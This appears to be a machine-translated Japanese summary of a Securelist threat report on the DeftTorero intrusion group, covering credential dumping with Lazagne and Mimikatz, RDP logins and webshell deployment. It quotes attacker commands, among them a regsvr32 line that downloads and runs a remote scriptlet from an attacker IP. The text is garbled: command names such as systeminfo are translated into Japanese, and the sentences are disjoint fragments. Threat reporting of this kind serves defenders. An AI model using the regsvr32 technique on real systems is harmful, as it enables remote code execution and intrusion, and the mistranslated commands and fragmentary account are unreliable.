DeftTorero: 明らかになった侵入の戦術、テクニック、手順 from securelist.com
security summary
最後に、他のいくつかの事例では、オペレーターが同じ組織内の他のシステムからサーバー資格情報を取得し、リモート デスクトップ (MSTSC.exe) を使用してログインして Webshell を展開したと思われます。
cmd.exe /c システム情報 |システム プロファイルとインストールされている修正プログラムを表示する
cmd.exe /c オープンファイル |リモートで開いたファイルを表示する
場合によっては、Lazagne.exe が使用され、別の場合では、それぞれの PE バイナリを実行するか、GitHub プロジェクトから base64 でエンコードされた PowerShell バージョンを呼び出して、Mimikatz の亜種が使用されました。
cmd.exe /c 」regsvr32 /s /n /u /i:httр://200.159.87[.]196:3306/jsJ13j.sct
ほとんどの侵入で同じ資格情報のダンプ戦略がオペレーターによって使用されてきましたが、変更がほとんど見られなかったいくつかのインスタンスがありました。
コメント